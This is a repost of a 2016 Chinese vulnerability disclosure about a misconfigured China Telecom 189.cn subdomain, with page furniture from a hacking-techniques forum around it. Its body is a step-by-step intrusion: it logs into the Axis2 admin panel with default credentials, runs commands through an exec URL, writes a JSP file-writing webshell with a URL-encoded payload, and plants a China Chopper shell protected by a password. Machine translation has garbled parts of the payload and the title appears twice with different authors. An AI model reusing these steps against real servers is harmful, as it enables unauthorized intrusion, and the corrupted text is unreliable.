中国电信189.cn某分站运维不当导致getshell

责声明">
漏洞标题 中国电信189.cn某分站运维不当导致getshell 相关厂商 中国电信 漏洞作者 撸撸侠 提交时间 2016-04-22 20:40 公开时间 2016-06-10 18:50 漏洞类型…
漏洞标题 中国电信189.cn分站运营维护不当导致了问题 相关制造商 中国电信 漏洞作者 姚夏 提交时间 2016-04-22 20: 40 公共时间 2016-06-10 18: 50 漏洞类型 系统/服务操作和维护配置不当 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 漏洞详细信息 http://**。**。**。**: 8081/axis2/axis2-admin/login admin axis2 由于端口的原因,您需要更改包,可以用burp替换它。 http://**。**。**。**: 8081/axis2/services/Cat/exec?cmd=whoami http://**。**。**。**: 8081/point/f.jsp f 写小马 http://**。**。**。**: 8081/axis2/services/Cat/writeStringToFile?data=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%**。* * ** **。FileOutputStream中(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22F%22)))。写(用request.getParameter(%22吨%22).getBytes()) %3B%25%3E&安培;文件=/选择/订购的Web/web应用/的axis2/q2.jsp&安培;编码=UTF-8和;追加=假 然后写一把菜刀马 http://**。**。**。**: 8081/axis2/test.jsp密码: f 漏洞证明: 屏幕快照 2016-04-22 下午6.29.55.png 屏幕快照 2016-04-22 下午6.31.06.png 屏幕快照 2016-04-22 下午6.31.21.png 屏幕快照 2016-04-22 下午6.31.57.png 修理计划: 版权声明:请注明出处撸撸侠@乌云
  • 发表于 2016-07-17 08:00
  • 阅读 ( 541 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章